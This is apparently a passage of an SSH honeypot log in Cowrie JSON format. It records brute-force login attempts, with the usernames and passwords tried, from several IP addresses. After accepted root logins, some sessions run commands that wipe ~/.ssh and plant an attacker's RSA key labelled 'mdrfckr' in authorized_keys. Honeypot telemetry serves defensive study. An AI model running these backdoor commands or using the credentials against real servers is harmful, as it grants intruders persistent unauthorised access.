acCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:20:52.036240Z","src_ip":"192.210.135.20","session":"65dda52de77d"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":38346,"dst_ip":"1.2.3.4","dst_port":22,"session":"934a3790c031","protocol":"ssh","message":"New connection: 154.209.4.55:38346 (1.2.3.4:22) [session: 934a3790c031]","sensor":"my-vps","timestamp":"2025-09-09T04:20:52.172425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:20:52.181241Z","src_ip":"154.209.4.55","session":"934a3790c031"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:20:52.378169Z","src_ip":"154.209.4.55","session":"934a3790c031"}
{"eventid":"cowrie.login.success","username":"root","password":"@123qwe","message":"login attempt [root/@123qwe] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:20:52.515712Z","src_ip":"192.210.135.20","session":"65dda52de77d"}
{"eventid":"cowrie.login.failed","username":"home","password":"12345678","message":"login attempt [home/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T04:20:52.726868Z","src_ip":"211.22.25.164","session":"5c0e25774326"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:20:52.754845Z","src_ip":"192.210.135.20","session":"65dda52de77d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:20:52.755538Z","src_ip":"192.210.135.20","session":"65dda52de77d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:20:52.756624Z","src_ip":"192.210.135.20","session":"65dda52de77d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:52.867357Z","src_ip":"192.210.135.20","session":"65dda52de77d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:20:53.189445Z","src_ip":"192.210.135.20","session":"65dda52de77d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:20:53.190211Z","src_ip":"192.210.135.20","session":"65dda52de77d"}
{"eventid":"cowrie.login.failed","username":"minerstat","password":"1234567890","message":"login attempt [minerstat/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T04:20:53.193062Z","src_ip":"154.209.4.55","session":"934a3790c031"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:20:53.302411Z","src_ip":"192.210.135.20","session":"65dda52de77d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:53.303273Z","src_ip":"192.210.135.20","session":"65dda52de77d"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":40950,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed57d9d1a613","protocol":"ssh","message":"New connection: 192.210.135.20:40950 (1.2.3.4:22) [session: ed57d9d1a613]","sensor":"my-vps","timestamp":"2025-09-09T04:20:53.411146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:20:53.412962Z","src_ip":"192.210.135.20","session":"ed57d9d1a613"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:20:53.522274Z","src_ip":"192.210.135.20","session":"ed57d9d1a613"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:53.968009Z","src_ip":"211.22.25.164","session":"5c0e25774326"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:20:53.999657Z","src_ip":"192.210.135.20","session":"ed57d9d1a613"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:54.402455Z","src_ip":"154.209.4.55","session":"934a3790c031"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:55.111818Z","src_ip":"192.210.135.20","session":"ed57d9d1a613"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":41920,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7a902c4d135","protocol":"ssh","message":"New connection: 192.210.135.20:41920 (1.2.3.4:22) [session: b7a902c4d135]","sensor":"my-vps","timestamp":"2025-09-09T04:20:55.220376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:20:55.221854Z","src_ip":"192.210.135.20","session":"b7a902c4d135"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:20:55.331146Z","src_ip":"192.210.135.20","session":"b7a902c4d135"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:20:55.812224Z","src_ip":"192.210.135.20","session":"b7a902c4d135"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:55.923019Z","src_ip":"192.210.135.20","session":"65dda52de77d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:20:55.923909Z","src_ip":"192.210.135.20","session":"b7a902c4d135"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":40252,"dst_ip":"1.2.3.4","dst_port":22,"session":"841d5848c700","protocol":"ssh","message":"New connection: 51.81.118.153:40252 (1.2.3.4:22) [session: 841d5848c700]","sensor":"my-vps","timestamp":"2025-09-09T04:21:06.868328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:21:06.869565Z","src_ip":"51.81.118.153","session":"841d5848c700"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:21:06.962733Z","src_ip":"51.81.118.153","session":"841d5848c700"}
{"eventid":"cowrie.login.failed","username":"build","password":"password123","message":"login attempt [build/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:21:07.375330Z","src_ip":"51.81.118.153","session":"841d5848c700"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:21:08.471514Z","src_ip":"51.81.118.153","session":"841d5848c700"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":53526,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b136d971e3f","protocol":"ssh","message":"New connection: 152.32.190.168:53526 (1.2.3.4:22) [session: 1b136d971e3f]","sensor":"my-vps","timestamp":"2025-09-09T04:21:22.540345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:21:22.541006Z","src_ip":"152.32.190.168","session":"1b136d971e3f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:21:22.742258Z","src_ip":"152.32.190.168","session":"1b136d971e3f"}
{"eventid":"cowrie.login.failed","username":"lenovo","password":"0","message":"login attempt [lenovo/0] failed","sensor":"my-vps","timestamp":"2025-09-09T04:21:23.586218Z","src_ip":"152.32.190.168","session":"1b136d971e3f"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:21:24.789890Z","src_ip":"152.32.190.168","session":"1b136d971e3f"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":43970,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7d681144f73","protocol":"ssh","message":"New connection: 103.59.95.12:43970 (1.2.3.4:22) [session: f7d681144f73]","sensor":"my-vps","timestamp":"2025-09-09T04:21:47.104674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:21:47.105553Z","src_ip":"103.59.95.12","session":"f7d681144f73"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:21:47.377837Z","src_ip":"103.59.95.12","session":"f7d681144f73"}
{"eventid":"cowrie.login.success","username":"root","password":"Radore1234","message":"login attempt [root/Radore1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:21:48.839442Z","src_ip":"103.59.95.12","session":"f7d681144f73"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:21:49.435377Z","src_ip":"103.59.95.12","session":"f7d681144f73"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:21:49.436144Z","src_ip":"103.59.95.12","session":"f7d681144f73"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:21:49.436956Z","src_ip":"103.59.95.12","session":"f7d681144f73"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:21:49.709794Z","src_ip":"103.59.95.12","session":"f7d681144f73"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:21:50.271852Z","src_ip":"103.59.95.12","session":"f7d681144f73"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:21:50.272672Z","src_ip":"103.59.95.12","session":"f7d681144f73"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:21:51.020769Z","src_ip":"103.59.95.12","session":"f7d681144f73"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:21:51.021745Z","src_ip":"103.59.95.12","session":"f7d681144f73"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":43980,"dst_ip":"1.2.3.4","dst_port":22,"session":"b416d3cffa0b","protocol":"ssh","message":"New connection: 103.59.95.12:43980 (1.2.3.4:22) [session: b416d3cffa0b]","sensor":"my-vps","timestamp":"2025-09-09T04:21:51.294948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:21:51.295841Z","src_ip":"103.59.95.12","session":"b416d3cffa0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:21:51.569059Z","src_ip":"103.59.95.12","session":"b416d3cffa0b"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":40900,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f7bf1d8dac8","protocol":"ssh","message":"New connection: 192.210.135.20:40900 (1.2.3.4:22) [session: 5f7bf1d8dac8]","sensor":"my-vps","timestamp":"2025-09-09T04:21:52.487704Z"}
